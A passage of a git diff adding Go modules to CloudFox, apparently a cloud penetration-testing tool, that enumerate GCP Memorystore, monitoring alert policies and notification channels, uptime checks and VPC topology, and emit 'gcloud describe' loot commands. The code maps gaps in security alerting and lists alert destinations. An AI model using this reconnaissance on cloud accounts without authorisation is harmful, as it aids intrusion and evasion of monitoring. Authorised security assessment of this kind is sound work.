m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) + } +} + +func (m *MemorystoreModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + body := m.instancesToTableBody(allInstances) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{Name: "memorystore", Header: m.getTableHeader(), Body: body}} + output := MemorystoreOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) + } +} diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go new file mode 100644 index 00000000..abd8f4c5 --- /dev/null +++ b/gcp/commands/monitoringalerts.go @@ -0,0 +1,948 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + monitoring "cloud.google.com/go/monitoring/apiv3/v2" + "cloud.google.com/go/monitoring/apiv3/v2/monitoringpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" + +var 
GCPMonitoringAlertsCommand = &cobra.Command{ + Use: GCP_MONITORINGALERTS_MODULE_NAME, + Aliases: []string{"alerts", "monitoring", "alerting"}, + Hidden: true, + Short: "Enumerate Cloud Monitoring alerting policies and notification channels", + Long: `Analyze Cloud Monitoring alerting policies and notification channels for security gaps. + +Features: +- Lists all alerting policies and their conditions +- Identifies disabled or misconfigured alerts +- Enumerates notification channels and their verification status +- Detects missing critical security alerts +- Identifies uptime check configurations +- Analyzes alert policy coverage gaps + +Required Security Alerts to Check: +- IAM policy changes +- Firewall rule changes +- VPC network changes +- Service account key creation +- Custom role changes +- Audit log configuration changes +- Cloud SQL authorization changes + +Requires appropriate IAM permissions: +- roles/monitoring.viewer +- roles/monitoring.alertPolicyViewer`, + Run: runGCPMonitoringAlertsCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AlertPolicy struct { + Name string + DisplayName string + ProjectID string + Enabled bool + Combiner string + Documentation string + Conditions []AlertCondition + NotificationChannels []string // Channel resource names +} + +type AlertCondition struct { + Name string + DisplayName string + ResourceType string + MetricType string + Filter string + ThresholdValue float64 + Duration string + Comparison string + Aggregation string +} + +type NotificationChannel struct { + Name string + DisplayName string + ProjectID string + Type string // email, slack, pagerduty, webhook, sms, pubsub + Enabled bool + Verified bool + Labels map[string]string + CreationTime string + MutationTime string +} + +type UptimeCheck struct { + Name string + DisplayName string + ProjectID string + MonitoredHost string + ResourceType string + Protocol string + Port int32 + Path string + Period 
string + Timeout string + SelectedRegion []string + Enabled bool + SSLEnabled bool +} + + +// ------------------------------ +// Module Struct +// ------------------------------ +type MonitoringAlertsModule struct { + gcpinternal.BaseGCPModule + + ProjectAlertPolicies map[string][]AlertPolicy // projectID -> policies + ProjectNotificationChannels map[string][]NotificationChannel // projectID -> channels + ProjectUptimeChecks map[string][]UptimeCheck // projectID -> checks + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type MonitoringAlertsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o MonitoringAlertsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o MonitoringAlertsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPMonitoringAlertsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_MONITORINGALERTS_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &MonitoringAlertsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAlertPolicies: make(map[string][]AlertPolicy), + ProjectNotificationChannels: make(map[string][]NotificationChannel), + ProjectUptimeChecks: make(map[string][]UptimeCheck), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *MonitoringAlertsModule) Execute(ctx context.Context, logger internal.Logger) { + // Create Monitoring client + alertClient, err := monitoring.NewAlertPolicyClient(ctx) + if err != nil { + 
logger.ErrorM(fmt.Sprintf("Failed to create Alert Policy client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + return + } + defer alertClient.Close() + + channelClient, err := monitoring.NewNotificationChannelClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Notification Channel client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + return + } + defer channelClient.Close() + + uptimeClient, err := monitoring.NewUptimeCheckClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Uptime Check client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + } + } + if uptimeClient != nil { + defer uptimeClient.Close() + } + + // Process each project + for _, projectID := range m.ProjectIDs { + m.processProject(ctx, projectID, alertClient, channelClient, uptimeClient, logger) + } + + // Check results + allPolicies := m.getAllAlertPolicies() + allChannels := m.getAllNotificationChannels() + allChecks := m.getAllUptimeChecks() + + if len(allPolicies) == 0 && len(allChannels) == 0 { + logger.InfoM("No monitoring alerts or notification channels found", GCP_MONITORINGALERTS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d alert policy(ies), %d notification channel(s), %d uptime check(s)", + len(allPolicies), len(allChannels), len(allChecks)), GCP_MONITORINGALERTS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *MonitoringAlertsModule) getAllAlertPolicies() []AlertPolicy { + var all []AlertPolicy + for _, policies := range m.ProjectAlertPolicies { + all = append(all, policies...) + } + return all +} + +func (m *MonitoringAlertsModule) getAllNotificationChannels() []NotificationChannel { + var all []NotificationChannel + for _, channels := range m.ProjectNotificationChannels { + all = append(all, channels...) 
+ } + return all +} + +func (m *MonitoringAlertsModule) getAllUptimeChecks() []UptimeCheck { + var all []UptimeCheck + for _, checks := range m.ProjectUptimeChecks { + all = append(all, checks...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *MonitoringAlertsModule) processProject(ctx context.Context, projectID string, alertClient *monitoring.AlertPolicyClient, channelClient *monitoring.NotificationChannelClient, uptimeClient *monitoring.UptimeCheckClient, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating monitoring for project: %s", projectID), GCP_MONITORINGALERTS_MODULE_NAME) + } + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["monitoring-alerts-commands"] = &internal.LootFile{ + Name: "monitoring-alerts-commands", + Contents: "# Monitoring Alerts Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // List alert policies + m.enumerateAlertPolicies(ctx, projectID, alertClient, logger) + + // List notification channels + m.enumerateNotificationChannels(ctx, projectID, channelClient, logger) + + // List uptime checks + if uptimeClient != nil { + m.enumerateUptimeChecks(ctx, projectID, uptimeClient, logger) + } +} + +func (m *MonitoringAlertsModule) enumerateAlertPolicies(ctx context.Context, projectID string, client *monitoring.AlertPolicyClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListAlertPoliciesRequest{ + Name: parent, + } + + it := client.ListAlertPolicies(ctx, req) + for { + policy, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + 
fmt.Sprintf("Could not enumerate alert policies in project %s", projectID)) + break + } + + alertPolicy := AlertPolicy{ + Name: policy.Name, + DisplayName: policy.DisplayName, + ProjectID: projectID, + Enabled: policy.Enabled.GetValue(), + Combiner: policy.Combiner.String(), + NotificationChannels: policy.NotificationChannels, + } + + if policy.Documentation != nil { + alertPolicy.Documentation = policy.Documentation.Content + } + + // Parse conditions + for _, cond := range policy.Conditions { + condition := AlertCondition{ + Name: cond.Name, + DisplayName: cond.DisplayName, + } + + // Parse based on condition type + switch c := cond.Condition.(type) { + case *monitoringpb.AlertPolicy_Condition_ConditionThreshold: + if c.ConditionThreshold != nil { + condition.Filter = c.ConditionThreshold.Filter + condition.Comparison = c.ConditionThreshold.Comparison.String() + condition.ThresholdValue = c.ConditionThreshold.ThresholdValue + + if c.ConditionThreshold.Duration != nil { + condition.Duration = c.ConditionThreshold.Duration.String() + } + + condition.MetricType = m.extractMetricType(c.ConditionThreshold.Filter) + } + case *monitoringpb.AlertPolicy_Condition_ConditionAbsent: + if c.ConditionAbsent != nil { + condition.Filter = c.ConditionAbsent.Filter + condition.MetricType = m.extractMetricType(c.ConditionAbsent.Filter) + } + case *monitoringpb.AlertPolicy_Condition_ConditionMonitoringQueryLanguage: + if c.ConditionMonitoringQueryLanguage != nil { + condition.Filter = c.ConditionMonitoringQueryLanguage.Query + } + } + + alertPolicy.Conditions = append(alertPolicy.Conditions, condition) + } + + m.mu.Lock() + m.ProjectAlertPolicies[projectID] = append(m.ProjectAlertPolicies[projectID], alertPolicy) + m.mu.Unlock() + } +} + +func (m *MonitoringAlertsModule) enumerateNotificationChannels(ctx context.Context, projectID string, client *monitoring.NotificationChannelClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := 
&monitoringpb.ListNotificationChannelsRequest{ + Name: parent, + } + + it := client.ListNotificationChannels(ctx, req) + for { + channel, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate notification channels in project %s", projectID)) + break + } + + notifChannel := NotificationChannel{ + Name: channel.Name, + DisplayName: channel.DisplayName, + ProjectID: projectID, + Type: channel.Type, + Enabled: channel.Enabled.GetValue(), + Labels: channel.Labels, + } + + // Check verification status + if channel.VerificationStatus == monitoringpb.NotificationChannel_VERIFIED { + notifChannel.Verified = true + } + + if channel.CreationRecord != nil { + notifChannel.CreationTime = channel.CreationRecord.MutateTime.AsTime().String() + } + + // MutationRecords is a slice - get the most recent one + if len(channel.MutationRecords) > 0 { + lastMutation := channel.MutationRecords[len(channel.MutationRecords)-1] + if lastMutation != nil { + notifChannel.MutationTime = lastMutation.MutateTime.AsTime().String() + } + } + + m.mu.Lock() + m.ProjectNotificationChannels[projectID] = append(m.ProjectNotificationChannels[projectID], notifChannel) + m.mu.Unlock() + } +} + +func (m *MonitoringAlertsModule) enumerateUptimeChecks(ctx context.Context, projectID string, client *monitoring.UptimeCheckClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListUptimeCheckConfigsRequest{ + Parent: parent, + } + + it := client.ListUptimeCheckConfigs(ctx, req) + for { + check, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate uptime checks in project %s", projectID)) + break + } + + uptimeCheck := UptimeCheck{ + Name: 
check.Name, + DisplayName: check.DisplayName, + ProjectID: projectID, + Enabled: !check.IsInternal, // Active checks returned by API are enabled; internal checks are system-managed + } + + // Parse resource type + switch r := check.Resource.(type) { + case *monitoringpb.UptimeCheckConfig_MonitoredResource: + if r.MonitoredResource != nil { + uptimeCheck.ResourceType = r.MonitoredResource.Type + if host, ok := r.MonitoredResource.Labels["host"]; ok { + uptimeCheck.MonitoredHost = host + } + } + } + + // Parse check request details + switch cr := check.CheckRequestType.(type) { + case *monitoringpb.UptimeCheckConfig_HttpCheck_: + if cr.HttpCheck != nil { + uptimeCheck.Protocol = "HTTP" + uptimeCheck.Port = cr.HttpCheck.Port + uptimeCheck.Path = cr.HttpCheck.Path + if cr.HttpCheck.UseSsl { + uptimeCheck.Protocol = "HTTPS" + uptimeCheck.SSLEnabled = true + } + } + case *monitoringpb.UptimeCheckConfig_TcpCheck_: + if cr.TcpCheck != nil { + uptimeCheck.Protocol = "TCP" + uptimeCheck.Port = cr.TcpCheck.Port + } + } + + if check.Period != nil { + uptimeCheck.Period = check.Period.String() + } + + if check.Timeout != nil { + uptimeCheck.Timeout = check.Timeout.String() + } + + // Check regions + for _, region := range check.SelectedRegions { + uptimeCheck.SelectedRegion = append(uptimeCheck.SelectedRegion, region.String()) + } + + m.mu.Lock() + m.ProjectUptimeChecks[projectID] = append(m.ProjectUptimeChecks[projectID], uptimeCheck) + m.mu.Unlock() + } +} + + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *MonitoringAlertsModule) extractMetricType(filter string) string { + // Extract metric type from filter string + // Format: metric.type="..." or resource.type="..." 
+ if strings.Contains(filter, "metric.type=") { + parts := strings.Split(filter, "metric.type=") + if len(parts) > 1 { + metricPart := strings.Split(parts[1], " ")[0] + return strings.Trim(metricPart, "\"") + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *MonitoringAlertsModule) addPolicyToLoot(projectID string, p AlertPolicy) { + lootFile := m.LootMap[projectID]["monitoring-alerts-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# POLICY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe alert policy:\n"+ + "gcloud alpha monitoring policies describe %s --project=%s\n\n", + p.DisplayName, + p.ProjectID, + extractResourceName(p.Name), p.ProjectID, + ) +} + +func (m *MonitoringAlertsModule) addChannelToLoot(projectID string, c NotificationChannel) { + lootFile := m.LootMap[projectID]["monitoring-alerts-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CHANNEL: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe notification channel:\n"+ + "gcloud alpha monitoring channels describe %s --project=%s\n\n", + c.DisplayName, + c.ProjectID, + extractResourceName(c.Name), c.ProjectID, + ) +} + +func (m *MonitoringAlertsModule) addUptimeCheckToLoot(projectID string, u UptimeCheck) { + lootFile := m.LootMap[projectID]["monitoring-alerts-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# UPTIME 
CHECK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe uptime check:\n"+ + "gcloud alpha monitoring uptime describe %s --project=%s\n\n", + u.DisplayName, + u.ProjectID, + extractResourceName(u.Name), u.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *MonitoringAlertsModule) getPoliciesHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Policy Name", + "Enabled", + "Condition Name", + "Metric Type", + "Comparison", + "Threshold", + "Duration", + "Notification Channels", + } +} + +func (m *MonitoringAlertsModule) getChannelsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Channel Name", + "Type", + "Enabled", + "Verified", + "Destination", + } +} + +func (m *MonitoringAlertsModule) getUptimeHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Check Name", + "Enabled", + "Host", + "Protocol", + "Port", + "Path", + "Period", + "Timeout", + "SSL Enabled", + } +} + +func (m *MonitoringAlertsModule) policiesToTableBody(policies []AlertPolicy, channelNameMap map[string]string) [][]string { + var body [][]string + for _, p := range policies { + // Resolve notification channel names + var channelNames []string + for _, channelRef := range p.NotificationChannels { + if name, ok := channelNameMap[channelRef]; ok { + channelNames = append(channelNames, name) + } else { + parts := strings.Split(channelRef, "/") + if len(parts) > 0 { + channelNames = append(channelNames, parts[len(parts)-1]) + } + } + } + notificationChannelsStr := "-" + if len(channelNames) > 0 { + 
notificationChannelsStr = strings.Join(channelNames, ", ") + } + + if len(p.Conditions) > 0 { + for _, cond := range p.Conditions { + metricType := cond.MetricType + if metricType == "" { + metricType = "-" + } + comparison := cond.Comparison + if comparison == "" { + comparison = "-" + } + threshold := "-" + if cond.ThresholdValue != 0 { + threshold = fmt.Sprintf("%.2f", cond.ThresholdValue) + } + duration := cond.Duration + if duration == "" { + duration = "-" + } + + body = append(body, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.DisplayName, + shared.BoolToYesNo(p.Enabled), + cond.DisplayName, + metricType, + comparison, + threshold, + duration, + notificationChannelsStr, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.DisplayName, + shared.BoolToYesNo(p.Enabled), + "-", + "-", + "-", + "-", + "-", + notificationChannelsStr, + }) + } + } + return body +} + +func (m *MonitoringAlertsModule) channelsToTableBody(channels []NotificationChannel) [][]string { + var body [][]string + for _, c := range channels { + destination := extractChannelDestination(c.Type, c.Labels) + body = append(body, []string{ + m.GetProjectName(c.ProjectID), + c.ProjectID, + c.DisplayName, + c.Type, + shared.BoolToYesNo(c.Enabled), + shared.BoolToYesNo(c.Verified), + destination, + }) + } + return body +} + +func (m *MonitoringAlertsModule) uptimeToTableBody(checks []UptimeCheck) [][]string { + var body [][]string + for _, u := range checks { + host := u.MonitoredHost + if host == "" { + host = "-" + } + path := u.Path + if path == "" { + path = "-" + } + timeout := u.Timeout + if timeout == "" { + timeout = "-" + } + + body = append(body, []string{ + m.GetProjectName(u.ProjectID), + u.ProjectID, + u.DisplayName, + shared.BoolToYesNo(u.Enabled), + host, + u.Protocol, + fmt.Sprintf("%d", u.Port), + path, + u.Period, + timeout, + shared.BoolToYesNo(u.SSLEnabled), + }) + } + return body +} + +func (m 
*MonitoringAlertsModule) buildTablesForProject(projectID string, channelNameMap map[string]string) []internal.TableFile { + var tableFiles []internal.TableFile + + if policies, ok := m.ProjectAlertPolicies[projectID]; ok && len(policies) > 0 { + sort.Slice(policies, func(i, j int) bool { + return policies[i].DisplayName < policies[j].DisplayName + }) + tableFiles = append(tableFiles, internal.TableFile{ + Name: "alerting-policies", + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(policies, channelNameMap), + }) + for _, p := range policies { + m.addPolicyToLoot(projectID, p) + } + } + + if channels, ok := m.ProjectNotificationChannels[projectID]; ok && len(channels) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "notification-channels", + Header: m.getChannelsHeader(), + Body: m.channelsToTableBody(channels), + }) + for _, c := range channels { + m.addChannelToLoot(projectID, c) + } + } + + if checks, ok := m.ProjectUptimeChecks[projectID]; ok && len(checks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "uptime-checks", + Header: m.getUptimeHeader(), + Body: m.uptimeToTableBody(checks), + }) + for _, u := range checks { + m.addUptimeCheckToLoot(projectID, u) + } + } + + return tableFiles +} + +func (m *MonitoringAlertsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build notification channel name map + channelNameMap := make(map[string]string) + for _, channels := range m.ProjectNotificationChannels { + for _, c := range channels { + channelNameMap[c.Name] = c.DisplayName + } + } + + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectAlertPolicies { + projectsWithData[projectID] = true + } + for projectID := range 
m.ProjectNotificationChannels { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectUptimeChecks { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID, channelNameMap) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = MonitoringAlertsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + } +} + +func (m *MonitoringAlertsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + // Build notification channel name map + channelNameMap := make(map[string]string) + for _, channels := range m.ProjectNotificationChannels { + for _, c := range channels { + channelNameMap[c.Name] = c.DisplayName + } + } + + allPolicies := m.getAllAlertPolicies() + allChannels := m.getAllNotificationChannels() + allChecks := m.getAllUptimeChecks() + + sort.Slice(allPolicies, func(i, j int) bool { + return allPolicies[i].DisplayName < allPolicies[j].DisplayName + }) + + var tables []internal.TableFile + + if len(allPolicies) > 0 { + tables = append(tables, internal.TableFile{ + Name: "alerting-policies", + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(allPolicies, channelNameMap), + }) + } + + if len(allChannels) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notification-channels", + Header: m.getChannelsHeader(), + Body: m.channelsToTableBody(allChannels), + }) + } + + 
if len(allChecks) > 0 { + tables = append(tables, internal.TableFile{ + Name: "uptime-checks", + Header: m.getUptimeHeader(), + Body: m.uptimeToTableBody(allChecks), + }) + } + + // Populate loot for flat output + for projectID, policies := range m.ProjectAlertPolicies { + for _, p := range policies { + m.addPolicyToLoot(projectID, p) + } + } + for projectID, channels := range m.ProjectNotificationChannels { + for _, c := range channels { + m.addChannelToLoot(projectID, c) + } + } + for projectID, checks := range m.ProjectUptimeChecks { + for _, u := range checks { + m.addUptimeCheckToLoot(projectID, u) + } + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := MonitoringAlertsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// extractChannelDestination extracts the destination info from channel labels +func extractChannelDestination(channelType string, labels map[string]string) string { + if labels == nil { + return "-" + } + + switch channelType { + case "email": + if email, ok := labels["email_address"]; ok { + return email + } + case "slack": + if channel, ok := labels["channel_name"]; ok { + return channel + } + case "pagerduty": + if key, ok := labels["service_key"]; ok { + // Truncate service key for display + if len(key) > 12 { + 
return key[:12] + "..." + } + return key + } + case "webhook_tokenauth", "webhook_basicauth": + if url, ok := labels["url"]; ok { + return url + } + case "pubsub": + if topic, ok := labels["topic"]; ok { + return topic + } + case "sms": + if number, ok := labels["number"]; ok { + return number + } + } + + // Try common label keys + for _, key := range []string{"url", "address", "endpoint", "target"} { + if val, ok := labels[key]; ok { + return val + } + } + + return "-" +} diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go new file mode 100644 index 00000000..7b0bd7f7 --- /dev/null +++ b/gcp/commands/networktopology.go @@ -0,0 +1,1756 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" +) + +// Module name constant +const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" + +var GCPNetworkTopologyCommand = &cobra.Command{ + Use: GCP_NETWORKTOPOLOGY_MODULE_NAME, + Aliases: []string{"topology", "network-map", "vpc-topology"}, + Short: "Visualize VPC network topology, peering relationships, and trust boundaries", + Long: `Analyze and visualize VPC network topology, peering relationships, and trust boundaries. 

Features:
- Maps all VPC networks and their subnets
- Identifies VPC peering relationships
- Detects Shared VPC configurations
- Analyzes VPC Service Controls perimeters
- Maps Cloud NAT and Private Google Access
- Identifies potential trust boundary issues
- Detects cross-project network access paths

Requires appropriate IAM permissions:
- roles/compute.networkViewer
- roles/compute.viewer`,
	Run: runGCPNetworkTopologyCommand,
}

// ------------------------------
// Data Structures
// ------------------------------

// VPCNetwork is a flattened view of one VPC network plus the peering and
// Shared VPC attributes this module derives for it.
type VPCNetwork struct {
	Name              string
	ProjectID         string
	SelfLink          string
	Description       string
	RoutingMode       string // from RoutingConfig when present, else ""
	AutoCreateSubnets bool
	SubnetCount       int
	PeeringCount      int
	IsSharedVPC       bool
	SharedVPCRole     string // "host" or "service"
	SharedVPCHost     string
	MTU               int64
	CreationTimestamp string
	FirewallRuleCount int
	// NOTE(review): field name has a typo ("Acces"); it is never assigned in
	// this file. Kept unchanged because renaming an exported field would
	// break any external consumers — TODO confirm and fix repo-wide.
	PrivateGoogleAcces bool
}

// Subnet captures one subnetwork, including its flow-log/PGA posture and any
// subnet-level IAM bindings discovered via GetIamPolicy.
type Subnet struct {
	Name                  string
	ProjectID             string
	Network               string // self-link of the parent network
	Region                string
	IPCIDRRange           string
	SecondaryRanges       []string // formatted "rangeName:cidr"
	PrivateIPGoogleAccess bool
	FlowLogsEnabled       bool
	Purpose               string
	Role                  string
	StackType             string
	IAMBindings           []SubnetIAMBinding
}

// SubnetIAMBinding is one (role, member) pair from a subnet IAM policy.
type SubnetIAMBinding struct {
	Role   string
	Member string
}

// VPCPeering describes one side of a VPC peering connection.
type VPCPeering struct {
	Name              string
	Network           string // local network self-link
	PeerNetwork       string // peer network self-link
	State             string
	StateDetails      string
	ExportCustomRoute bool
	ImportCustomRoute bool
	ExportSubnetRoute bool // subnet routes with public IP
	ImportSubnetRoute bool
	ProjectID         string
	PeerProjectID     string // parsed out of the PeerNetwork URL
	AutoCreateRoutes  bool
}

// SharedVPCConfig records a Shared VPC host project and its attachments.
type SharedVPCConfig struct {
	HostProject     string
	ServiceProjects []string
	SharedSubnets   []string
	SharedNetworks  []string
}

// CloudNATConfig summarizes one NAT configuration found on a Cloud Router.
type CloudNATConfig struct {
	Name                 string
	ProjectID            string
	Region               string
	Network              string
	Subnets              []string
	NATIPAddresses       []string // empty means auto-allocated IPs
	MinPortsPerVM        int64
	SourceSubnetworkType string
	EnableLogging        bool
}

// NetworkRoute is a single route with its resolved next-hop kind.
type NetworkRoute struct {
	Name        string
	ProjectID   string
	Network     string
	DestRange   string
	NextHop     string
	NextHopType string // "gateway"|"instance"|"ip"|"network"|"peering"|"ilb"|"vpn"
	Priority    int64
	Tags        []string
}

// ------------------------------
// Module Struct
// ------------------------------

// NetworkTopologyModule accumulates per-project network inventory. All maps
// are written from per-project goroutines and are guarded by mu.
type NetworkTopologyModule struct {
	gcpinternal.BaseGCPModule

	ProjectNetworks map[string][]VPCNetwork                  // projectID -> networks
	ProjectSubnets  map[string][]Subnet                      // projectID -> subnets
	ProjectPeerings map[string][]VPCPeering                  // projectID -> peerings
	ProjectNATs     map[string][]CloudNATConfig              // projectID -> NATs
	ProjectRoutes   map[string][]NetworkRoute                // projectID -> routes
	SharedVPCs      map[string]*SharedVPCConfig              // hostProjectID -> config
	LootMap         map[string]map[string]*internal.LootFile // projectID -> loot files
	mu              sync.Mutex
}

// ------------------------------
// Output Struct
// ------------------------------

// NetworkTopologyOutput satisfies the CloudFox output interface.
type NetworkTopologyOutput struct {
	Table []internal.TableFile
	Loot  []internal.LootFile
}

func (o NetworkTopologyOutput) TableFiles() []internal.TableFile { return o.Table }
func (o NetworkTopologyOutput) LootFiles() []internal.LootFile   { return o.Loot }

// ------------------------------
// Command Entry Point
// ------------------------------

// runGCPNetworkTopologyCommand wires the cobra command to the module: it
// builds the command context, constructs an empty module, and runs it.
func runGCPNetworkTopologyCommand(cmd *cobra.Command, args []string) {
	// Initialize command context; InitializeCommandContext is assumed to have
	// reported the error to the user already, so we just bail out.
	cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_NETWORKTOPOLOGY_MODULE_NAME)
	if err != nil {
		return
	}

	// Create module instance with all result maps pre-allocated.
	module := &NetworkTopologyModule{
		BaseGCPModule:   gcpinternal.NewBaseGCPModule(cmdCtx),
